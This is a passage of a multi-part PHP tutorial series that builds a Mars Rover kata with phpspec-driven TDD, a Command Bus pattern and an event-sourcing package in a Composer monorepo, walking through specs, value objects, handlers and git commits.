$this->beConstructedWith(self::INVALID_INSTRUCTION);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
Let's run the tests one last time:
vendor/bin/phpspec run
All grin ;). That's enough for us to commit our work:
git add -A
git commit -m '4: Created Instruction'
We've refactored DriveRover by extracting an Instruction value object. It
allowed us to write more tests to describe all the possible values.
In the next article, we'll write the actual driving logic.
We just finished developing the first use case, so we can now get cracking on the second one, driving the rover:
Once a rover has been landed on Mars it is possible to drive them, using instructions such as move_forward (keeps orientation, but moves along the x or y axis) or turn_left / turn_right (keeps the same coordinates, but changes the orientation).
Again, we start by creating a class with the name of our use case. It will take care of doing a simple validation on the input provided by the user:
cd packages/navigation
git checkout -b 4-driving
Using phpspec, we bootstrap the test class:
vendor/bin/phpspec describe 'MarsRover\Navigation\DriveRover'
This should generate this spec/MarsRover/Navigation/DriveRoverSpec.php class:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\DriveRover;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class DriveRoverSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(DriveRover::class);
}
}
This leaves us the task of editing it to start describing input parameters:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class DriveRoverSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = 'move_forward';
function it_has_a_driving_instruction()
{
$this->beConstructedWith(
self::DRIVING_INSTRUCTION
);
$this->getInstruction()->shouldBe(self::DRIVING_INSTRUCTION);
}
}
We can now run the tests:
vendor/bin/phpspec run
This will generate the src/MarsRover/Navigation/DriveRover.php file:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
private $argument;
public function __construct($argument)
{
$this->argument = $argument;
}
public function getInstruction()
{
}
}
All we need to do is to edit it:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
private $instruction;
public function __construct($instruction)
{
$this->instruction = $instruction;
}
public function getInstruction() : string
{
return $this->instruction;
}
}
Let's check the tests:
vendor/bin/phpspec run
All green! Now let's add some unhappy scenarios to our tests:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class DriveRoverSpec extends ObjectBehavior
{
const DRIVING_INSTRUCTION = 'move_forward';
const INVALID_DRIVING_INSTRUCTION = 'wake_up_polly_parrot';
function it_has_a_driving_instruction()
{
$this->beConstructedWith(
self::DRIVING_INSTRUCTION
);
$this->getInstruction()->shouldBe(self::DRIVING_INSTRUCTION);
}
function it_cannot_have_invalid_instruction()
{
$this->beConstructedWith(
self::INVALID_DRIVING_INSTRUCTION
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
We can run the tests:
vendor/bin/phpspec run
They fail! So let's complete the code:
<?php
namespace MarsRover\Navigation;
class DriveRover
{
const VALID_INSTRUCTIONS = [
'move_forward',
'turn_left',
'turn_right',
];
private $instruction;
public function __construct($instruction)
{
if (false === in_array($instruction, self::VALID_INSTRUCTIONS, true)) {
throw new \InvalidArgumentException(
'Instruction should be one of: '
.implode(', ', self::VALID_INSTRUCTIONS)
);
}
$this->instruction = $instruction;
}
public function getInstruction() : string
{
return $this->instruction;
}
}
And re-run the tests:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '4: Created DriveRover'
We've once again followed the TDD methodology: write the test, then the code. We took care of describing the happy scenario first, and then the unhappy scenarios, to cover all the cases.
We've also used the same twist on the Command Bus pattern: we created a Command class that describes the use case (drive the rover) and does a simple validation on the input.
In the next article, we'll proceed to the third step of TDD: refactoring
DriveRover by extracting Instruction in its own class.
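As a preview of what that refactoring might produce (the names and details here are guesses, the next article will do this properly), an Instruction value object could absorb the validation currently living in DriveRover:

```php
<?php

namespace MarsRover\Navigation;

// Hypothetical preview of the extraction: a small value object
// holding the validation currently done in DriveRover's constructor.
class Instruction
{
    const MOVE_FORWARD = 'move_forward';
    const TURN_LEFT = 'turn_left';
    const TURN_RIGHT = 'turn_right';

    const VALID_INSTRUCTIONS = [
        self::MOVE_FORWARD,
        self::TURN_LEFT,
        self::TURN_RIGHT,
    ];

    private $instruction;

    public function __construct($instruction)
    {
        if (false === in_array($instruction, self::VALID_INSTRUCTIONS, true)) {
            throw new \InvalidArgumentException(
                'Instruction should be one of: '
                .implode(', ', self::VALID_INSTRUCTIONS)
            );
        }

        $this->instruction = $instruction;
    }

    public function get() : string
    {
        return $this->instruction;
    }
}
```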
Up until now, we've implemented the first use case, "Landing a rover on Mars":
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
We've also created an event-sourcing package with the following interfaces:
- Event, a Data Transfer Object (DTO) that contains the name and the data
- AnEventHappened, which is actually an Event factory
- EventStore, a service responsible for "logging" Events

In this article, we're going to implement them.
Let's start by asking phpspec to generate the test class:
vendor/bin/phpspec describe 'MarsRover\EventSourcing\Event'
It should have generated the following
spec/MarsRover/EventSourcing/EventSpec.php file:
<?php
namespace spec\MarsRover\EventSourcing;
use MarsRover\EventSourcing\Event;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class EventSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Event::class);
}
}
We're going to start writing test methods that describe what kind of data this DTO holds:
<?php
namespace spec\MarsRover\EventSourcing;
use PhpSpec\ObjectBehavior;
class EventSpec extends ObjectBehavior
{
const NAME = 'something_happened';
const DATA = [
'message' => 'We are the knights who say Ni!',
];
function let(\DateTime $receivedAt)
{
$this->beConstructedWith(
self::NAME,
self::DATA,
$receivedAt
);
}
function it_has_a_name()
{
$this->getName()->shouldBe(self::NAME);
}
function it_has_data()
{
$this->getData()->shouldBe(self::DATA);
}
function it_has_been_received_at_a_date_and_time(\DateTime $receivedAt)
{
$this->getReceivedAt()->shouldBe($receivedAt);
}
}
We can now run the tests to bootstrap the class:
vendor/bin/phpspec run
It will overwrite the existing src/MarsRover/EventSourcing/Event.php file:
<?php
namespace MarsRover\EventSourcing;
use DateTimeInterface;
class Event
{
public function __construct($argument1, array $argument2, DateTimeInterface $dateTime)
{
}
public function getName()
{
}
public function getData()
{
}
public function getReceivedAt()
{
}
}
We can edit it to make the tests pass:
<?php
namespace MarsRover\EventSourcing;
class Event
{
private $name;
private $data;
private $receivedAt;
public function __construct(
string $name,
array $data,
\DateTimeInterface $receivedAt
) {
$this->name = $name;
$this->data = $data;
$this->receivedAt = $receivedAt;
}
public function getName() : string
{
return $this->name;
}
public function getData() : array
{
return $this->data;
}
public function getReceivedAt() : \DateTimeInterface
{
return $this->receivedAt;
}
}
Let's check if everything is alright:
vendor/bin/phpspec run
And it is! Time to commit our work:
git add -A
git commit -m '3: Created Event'
The next class to implement is AnEventHappened. Let's create its test:
vendor/bin/phpspec describe 'MarsRover\EventSourcing\AnEventHappened'
It should generate the spec/MarsRover/EventSourcing/AnEventHappenedSpec.php
file:
<?php
namespace spec\MarsRover\EventSourcing;
use MarsRover\EventSourcing\AnEventHappened;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class AnEventHappenedSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(AnEventHappened::class);
}
}
We can start describing this factory by writing test methods:
<?php
namespace spec\MarsRover\EventSourcing;
use MarsRover\EventSourcing\Event;
use PhpSpec\ObjectBehavior;
class AnEventHappenedSpec extends ObjectBehavior
{
const NAME = 'something_happened';
const DATA = [
'message' => 'And now for something completely different',
];
function it_can_create_events()
{
$this->justNow(self::NAME, self::DATA)->shouldHaveType(Event::class);
}
}
Running the tests will generate the class:
vendor/bin/phpspec run
It should have overwritten the
src/MarsRover/EventSourcing/AnEventHappened.php file with:
<?php
namespace MarsRover\EventSourcing;
class AnEventHappened
{
public function justNow($argument1, $argument2)
{
}
}
We can now complete it:
<?php
namespace MarsRover\EventSourcing;
class AnEventHappened
{
public function justNow(string $name, array $data) : Event
{
return new Event($name, $data, new \DateTime());
}
}
Let's run the tests:
vendor/bin/phpspec run
All green! Time to commit:
git add -A
git commit -m '3: Created AnEventHappened'
We replaced the generated interfaces for AnEventHappened and Event with
classes, which have been tested.
EventStore could log events in a log file, or in a database, or send them as
messages to a queue to be processed later... For that reason we'll keep the
interface.
We're going to delay its implementation until later, when the rover is almost done.
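To give an idea of what such an implementation could look like, here's a hypothetical in-memory EventStore (the interface is repeated only to keep the sketch self-contained); it isn't part of the package, just an illustration:

```php
<?php

namespace MarsRover\EventSourcing;

// The interface, repeated here so the sketch is self-contained.
interface EventStore
{
    public function log($argument1);
}

// Hypothetical implementation, handy for tests: it simply keeps
// logged events in an array instead of persisting them anywhere.
class InMemoryEventStore implements EventStore
{
    private $events = [];

    public function log($event)
    {
        $this->events[] = $event;
    }

    public function getAll() : array
    {
        return $this->events;
    }
}
```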
If we run the tests from the project's root, we'll see that phpspec runs tests for
both navigation and event-sourcing in one go. This is one advantage of a
MonoRepo: it makes it easy to make sure that changes in a package don't break
the other packages that depend on it.
We can now merge our branch:
cd ../../
git checkout master
git merge --no-ff 3-event-sourcing
In the next article we'll start developing the second use case: Driving the rover.
Up until now, we've implemented the first use case, "Landing a rover on Mars":
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
In order to do so, we've:
In the last article, we wrote some Event Sourcing code:
- Event, a Data Transfer Object (DTO) that contains the name and the data
- AnEventHappened, which is actually an Event factory
- EventStore, a service responsible for "logging" Events

In this article, we're going to extract them from the navigation package and
put them in their own event-sourcing package.
Creating the event-sourcing package

We can start by creating the directory:
git checkout -b 3-event-sourcing
mkdir -p packages/event-sourcing
cd packages/event-sourcing
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/event-sourcing",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Event Sourcing",
"autoload": {
"psr-4": { "MarsRover\\EventSourcing\\": "src/MarsRover/EventSourcing" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and
to get the most of it we'd like to use its SpecGen
extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add -A
git commit -m '3: Created Event Sourcing package'
Adding event-sourcing to the project

Let's go back to the project's root:
cd ../../
All we need to do is to add a new line in the require section of our
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"mars-rover/navigation": "*@dev",
"php": "^7.0"
},
"require-dev": {
"phpspec/phpspec": "^3.0@beta"
}
}
Actually, we also need to add a new section in phpspec.yml.dist:
suites:
event-sourcing:
namespace: 'MarsRover\EventSourcing'
src_path: packages/event-sourcing/src
spec_path: packages/event-sourcing
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
vendor/bin/phpspec run
That should be enough for a second commit:
git add -A
git commit -m '3: Added event-sourcing package to main project'
It's now time to move Event Sourcing files from navigation to
event-sourcing:
cd packages/event-sourcing
mkdir -p src/MarsRover/EventSourcing
mv ../navigation/src/MarsRover/Navigation/{EventStore.php,Event.php,AnEventHappened.php} ./src/MarsRover/EventSourcing/
We then need to change namespaces:
sed -i 's/Navigation/EventSourcing/g' ./src/MarsRover/EventSourcing/*
To continue those namespace changes we'll have to move back to the navigation
package:
cd ../navigation
Then rename the namespaces:
sed -i 's/Navigation\\Event;/EventSourcing\\Event;/g' ./spec/MarsRover/Navigation/*
sed -i 's/Navigation\\EventStore;/EventSourcing\\EventStore;/g' ./spec/MarsRover/Navigation/*
sed -i 's/Navigation\\AnEventHappened;/EventSourcing\\AnEventHappened;/g' ./spec/MarsRover/Navigation/*
We'll also need to add use statements to
./src/MarsRover/Navigation/LandRoverHandler.php:
<?php
namespace MarsRover\Navigation;
use MarsRover\EventSourcing\{
AnEventHappened,
EventStore
};
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$roverLanded = $this->anEventHappened->justNow(Events::ROVER_LANDED, [
'x' => $landRover->getCoordinates()->getX(),
'y' => $landRover->getCoordinates()->getY(),
'orientation' => $landRover->getOrientation()->get(),
]);
$this->eventStore->log($roverLanded);
}
}
Since navigation now relies on event-sourcing classes, we need to add it in
composer.json:
{
"name": "mars-rover/navigation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Navigation",
"autoload": {
"psr-4": { "MarsRover\\Navigation\\": "src/MarsRover/Navigation" }
},
"repositories": [
{
"type": "path",
"url": "../*"
}
],
"require": {
"mars-rover/event-sourcing": "*@dev",
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
As we can see, it's quite similar to what we've done in the project's root:
we've added a repositories section with the path to packages (../) and
then added mars-rover/event-sourcing to the require section, with the
version *@dev (any version, including unstable ones).
We are now able to run Composer:
composer update --optimize-autoloader
Let's run the tests:
vendor/bin/phpspec run
All green! We can now commit our new package:
cd ../../
git add -A
git commit -m '3: Moved Event Sourcing classes to their own package'
We identified AnEventHappened, Event and EventStore as objects that
could be in their own package, so we created event-sourcing and moved them
in it. This also meant we had to add this package to the project's root and to
navigation.
In the next article, we'll implement AnEventHappened and Event.
Previously we've created a
navigation package, and in it
a LandRover class that
validates input parameters for our
first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
We've then refactored it to extract coordinates and orientation in their own classes.
In this article we're going to create the actual landing logic, using Event Sourcing:
cd packages/navigation
git checkout 2-landing
Following our Command Bus twist,
we're now going to create the LandRoverHandler class that's going to take
care of the actual logic associated with the LandRover use case. We start
by bootstrapping the test class:
vendor/bin/phpspec describe 'MarsRover\Navigation\LandRoverHandler'
This should create the following
spec/MarsRover/Navigation/LandRoverHandlerSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\LandRoverHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LandRoverHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(LandRoverHandler::class);
}
}
Event Sourcing is
all about recording significant actions. Landing a rover seems significant
enough, so that's what LandRoverHandler should do:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\AnEventHappened;
use MarsRover\Navigation\Event;
use MarsRover\Navigation\EventStore;
use MarsRover\Navigation\LandRover;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const EVENT_NAME = 'rover_landed';
const EVENT_DATA = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_lands_a_rover_at_given_location(
AnEventHappened $anEventHappened,
Event $roverLanded,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$landRover = new LandRover(
self::X,
self::Y,
self::ORIENTATION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverLanded);
$eventStore->log($roverLanded)->shouldBeCalled();
$this->handle($landRover);
}
}
In this test, we rely on:
- Event, a Data Transfer Object (DTO) that contains the name and the data
- AnEventHappened, which is actually an Event factory
- EventStore, a service responsible for "logging" Events

We could have done without the factory and created Event directly in
LandRoverHandler, but then we'd have no way to check in our tests that it
was constructed with the right data.
Those classes don't exist yet; we've made them up to build a coherent story. Let's run the tests:
vendor/bin/phpspec run
They fail because of the missing classes... But phpspec bootstrapped them for us!
It created the src/MarsRover/Navigation/AnEventHappened.php file:
<?php
namespace MarsRover\Navigation;
interface AnEventHappened
{
public function justNow($argument1, $argument2);
}
It also created the src/MarsRover/Navigation/Event.php file:
<?php
namespace MarsRover\Navigation;
interface Event
{
}
And it created the src/MarsRover/Navigation/EventStore.php file:
<?php
namespace MarsRover\Navigation;
interface EventStore
{
public function log($argument1);
}
As we can see, when we reference a non-existent class, phpspec generates an interface for us. It also generates methods, if we've described method calls in our test.
For now we'll leave them like this, and have a look at the generated
src/MarsRover/Navigation/LandRoverHandler.php file:
<?php
namespace MarsRover\Navigation;
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(AnEventHappened $anEventHappened, EventStore $eventStore)
{
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
}
}
Thanks to the SpecGen extension, phpspec was able to detect Dependency Injection, and bootstrapped a constructor with an attribute initialization for us. How nice!
We'll just need to complete the handle method:
<?php
namespace MarsRover\Navigation;
class LandRoverHandler
{
const EVENT_NAME = 'rover_landed';
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$roverLanded = $this->anEventHappened->justNow(self::EVENT_NAME, [
'x' => $landRover->getCoordinates()->getX(),
'y' => $landRover->getCoordinates()->getY(),
'orientation' => $landRover->getOrientation()->get(),
]);
$this->eventStore->log($roverLanded);
}
}
Overall, the code looks very similar to the test. Let's run them:
vendor/bin/phpspec run
All green! We might want to use the same event name in both the code and the
test, so let's create a src/MarsRover/Navigation/Events.php file:
<?php
namespace MarsRover\Navigation;
class Events
{
const ROVER_LANDED = 'rover_landed';
}
Then use it in the code:
<?php
namespace MarsRover\Navigation;
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$roverLanded = $this->anEventHappened->justNow(Events::ROVER_LANDED, [
'x' => $landRover->getCoordinates()->getX(),
'y' => $landRover->getCoordinates()->getY(),
'orientation' => $landRover->getOrientation()->get(),
]);
$this->eventStore->log($roverLanded);
}
}
and finally in the test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\AnEventHappened;
use MarsRover\Navigation\Event;
use MarsRover\Navigation\Events;
use MarsRover\Navigation\EventStore;
use MarsRover\Navigation\LandRover;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const EVENT_NAME = Events::ROVER_LANDED;
const EVENT_DATA = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_lands_a_rover_at_given_location(
AnEventHappened $anEventHappened,
Event $roverLanded,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$landRover = new LandRover(
self::X,
self::Y,
self::ORIENTATION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverLanded);
$eventStore->log($roverLanded)->shouldBeCalled();
$this->handle($landRover);
}
}
We can run the tests one last time:
vendor/bin/phpspec run
Still green! We can commit our work:
git add -A
git commit -m '2: Created LandRoverHandler'
git checkout master
git merge --no-ff 2-landing
With Event Sourcing, the logic associated to our "Landing a Rover on Mars" use case is quite simple: we just record it as an event.
In the next article, we'll extract Event Sourcing logic from the navigation
package and put it in its own event-sourcing one.
Previously we've created a
navigation package, and in it
a LandRover class that
validates input parameters for our
first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
We've also started to refactor it by extracting coordinates in their own class.
In this article we're going to further refactor LandRover:
cd packages/navigation
git checkout 2-landing
By having a look at LandRover, we can guess that it has 2 reasons to change:
- x and y might become floats, or have an additional z

This hints toward two new classes, extracted from LandRover: Coordinates
and Orientation. In this article we'll take care of Orientation.
Let's start by bootstrapping the Orientation test class using
phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\Orientation'
It should create the spec/MarsRover/Navigation/OrientationSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class OrientationSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(self::class);
}
}
Instead of reusing tests from LandRover, we'll try to describe all the
possible orientations:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class OrientationSpec extends ObjectBehavior
{
const NORTH = 'north';
const EAST = 'east';
const WEST = 'west';
const SOUTH = 'south';
function it_can_face_north()
{
$this->beConstructedWith(self::NORTH);
$this->get()->shouldBe(self::NORTH);
}
function it_can_face_east()
{
$this->beConstructedWith(self::EAST);
$this->get()->shouldBe(self::EAST);
}
function it_can_face_west()
{
$this->beConstructedWith(self::WEST);
$this->get()->shouldBe(self::WEST);
}
function it_can_face_south()
{
$this->beConstructedWith(self::SOUTH);
$this->get()->shouldBe(self::SOUTH);
}
function it_cannot_face_anywhere_else()
{
$this->beConstructedWith('Somewhere else');
$this
->shouldThrow(\InvalidArgumentException::class)
->duringInstantiation()
;
}
}
Now we can run the tests:
vendor/bin/phpspec run
They fail because src/MarsRover/Navigation/Orientation.php doesn't exist,
so phpspec bootstrapped it for us:
<?php
namespace MarsRover\Navigation;
class Orientation
{
private $argument;
public function __construct($argument)
{
$this->argument = $argument;
}
public function get()
{
}
}
We can edit it:
<?php
namespace MarsRover\Navigation;
class Orientation
{
const NORTH = 'north';
const EAST = 'east';
const WEST = 'west';
const SOUTH = 'south';
const ALLOWED_ORIENTATIONS = [
self::NORTH,
self::EAST,
self::WEST,
self::SOUTH,
];
private $orientation;
public function __construct($orientation)
{
if (false === in_array($orientation, self::ALLOWED_ORIENTATIONS, true)) {
throw new \InvalidArgumentException(
'Orientation must be one of: '
.implode(', ', self::ALLOWED_ORIENTATIONS)
);
}
$this->orientation = $orientation;
}
public function get() : string
{
return $this->orientation;
}
}
And run the tests:
vendor/bin/phpspec run
All green! It's important to note that tests should also be refactored.
We're going to use Orientation constants in the tests:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class OrientationSpec extends ObjectBehavior
{
function it_can_face_north()
{
$this->beConstructedWith(Orientation::NORTH);
$this->get()->shouldBe(Orientation::NORTH);
}
function it_can_face_east()
{
$this->beConstructedWith(Orientation::EAST);
$this->get()->shouldBe(Orientation::EAST);
}
function it_can_face_west()
{
$this->beConstructedWith(Orientation::WEST);
$this->get()->shouldBe(Orientation::WEST);
}
function it_can_face_south()
{
$this->beConstructedWith(Orientation::SOUTH);
$this->get()->shouldBe(Orientation::SOUTH);
}
function it_cannot_face_anywhere_else()
{
$this->beConstructedWith('Somewhere else');
$this
->shouldThrow(\InvalidArgumentException::class)
->duringInstantiation()
;
}
}
Running the tests again:
vendor/bin/phpspec run
Still green! We can now update LandRover tests to use Orientation:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_coordinates()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$coordinates = $this->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->get()->shouldBe(self::ORIENTATION);
}
}
We've removed orientation checking from LandRover tests, as we now trust
Orientation to do the job. Now we can use Orientation in LandRover:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $coordinates;
private $orientation;
public function __construct($x, $y, $orientation)
{
$this->coordinates = new Coordinates($x, $y);
$this->orientation = new Orientation($orientation);
}
public function getCoordinates() : Coordinates
{
return $this->coordinates;
}
public function getOrientation() : Orientation
{
return $this->orientation;
}
}
Let's run the tests:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '2: Created Orientation'
Once again we've completed the full TDD cycle: first test, then code and finally refactor.
Before we started to extract Coordinates and Orientation, LandRover tests
were getting long, so we didn't go into too much detail.
This refactoring gave us more confidence and allowed us to add more test cases.
phpspec has been really helpful by bootstrapping tests, and then, when running the tests, by bootstrapping code: it makes the whole TDD cycle more natural. But it also allows us to have runnable self-checking specifications:
vendor/bin/phpspec run --format=pretty
This should now output:
MarsRover\Navigation\Coordinates
12 ✔ has x coordinate
22 ✔ cannot have non integer x coordinate
34 ✔ has y coordinate
44 ✔ cannot have non integer y coordinate
MarsRover\Navigation\LandRover
14 ✔ has coordinates
27 ✔ has an orientation
MarsRover\Navigation\Orientation
10 ✔ can face north
17 ✔ can face east
24 ✔ can face west
31 ✔ can face south
38 ✔ cannot face anywhere else
3 specs
11 examples (11 passed)
12ms
In the next article we'll create the actual landing logic, using Event Sourcing.
Previously we've created a
navigation package, and in it
a LandRover class that
validates input parameters for our
first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
In this article we're going to refactor LandRover:
cd packages/navigation
git checkout 2-landing
By having a look at LandRover, we can guess that it has 2 reasons to change:
- x and y might become floats, or have an additional z

This hints toward two new classes, extracted from LandRover: Coordinates
and Orientation. In this article we'll take care of Coordinates.
First let's bootstrap the test class, using phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\Coordinates'
This will create the spec/MarsRover/Navigation/CoordinatesSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Coordinates;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class CoordinatesSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Coordinates::class);
}
}
We can edit it, by using what we've done in LandRover test class:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class CoordinatesSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
function it_has_x_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y
);
$this->getX()->shouldBe(self::X);
}
function it_cannot_have_non_integer_x_coordinate()
{
$this->beConstructedWith(
'Nobody expects the Spanish Inquisition!',
self::Y
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
function it_has_y_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y
);
$this->getY()->shouldBe(self::Y);
}
function it_cannot_have_non_integer_y_coordinate()
{
$this->beConstructedWith(
self::X,
'No one expects the Spanish Inquisition!'
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
If we run the tests now, phpspec will bootstrap the Coordinates class:
vendor/bin/phpspec run
And it indeed created the src/MarsRover/Navigation/Coordinates.php file:
<?php
namespace MarsRover\Navigation;
class Coordinates
{
private $argument1;
private $argument2;
public function __construct($argument1, $argument2)
{
$this->argument1 = $argument1;
$this->argument2 = $argument2;
}
public function getX()
{
}
public function getY()
{
}
}
This leaves us with the task of completing it, reusing what's been done in
LandRover class:
<?php
namespace MarsRover\Navigation;
class Coordinates
{
private $x;
private $y;
public function __construct($x, $y)
{
if (false === is_int($x)) {
throw new \InvalidArgumentException(
'X coordinate must be an integer'
);
}
$this->x = $x;
if (false === is_int($y)) {
throw new \InvalidArgumentException(
'Y coordinate must be an integer'
);
}
$this->y = $y;
}
public function getX() : int
{
return $this->x;
}
public function getY() : int
{
return $this->y;
}
}
We can run the tests:
vendor/bin/phpspec run
All green! Now all we have to do is update LandRover test class to use
Coordinates:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
function it_has_coordinates()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$coordinates = $this->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->shouldBe(self::ORIENTATION);
}
function it_cannot_have_a_non_cardinal_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
'A hareng!'
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
We no longer need to check for invalid x and y values, as we trust
Coordinates to take care of them for us. We can now update LandRover class:
<?php
namespace MarsRover\Navigation;
class LandRover
{
const VALID_ORIENTATIONS = ['north', 'east', 'west', 'south'];
private $coordinates;
private $orientation;
public function __construct($x, $y, $orientation)
{
$this->coordinates = new Coordinates($x, $y);
if (false === in_array($orientation, self::VALID_ORIENTATIONS, true)) {
throw new \InvalidArgumentException(
'Orientation must be one of: '
.implode(', ', self::VALID_ORIENTATIONS)
);
}
$this->orientation = $orientation;
}
public function getCoordinates() : Coordinates
{
return $this->coordinates;
}
public function getOrientation() : string
{
return $this->orientation;
}
}
And that should make our test pass:
vendor/bin/phpspec run
All green! That's enough for us to commit our work:
git add -A
git commit -m '2: Created Coordinates'
We've followed the full cycle of TDD: test, code and refactor. Using phpspec has been really helpful, as it bootstrapped the test classes and then their code classes for us.
In the next article, we'll extract Orientation from LandRover.
Previously we've created a navigation package, we can now start developing the first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
x and y, which are both integers) and an orientation (a string being one of north, east, west or south).
The Command Bus design pattern is composed of 3 classes:
